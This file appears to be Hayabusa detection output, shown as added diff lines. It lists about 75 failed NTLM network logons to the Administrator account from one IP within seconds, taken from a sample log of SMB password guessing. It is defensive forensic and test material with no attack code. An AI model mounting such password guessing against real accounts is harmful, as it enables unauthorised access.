+2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9VByeO8vHGSOJK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
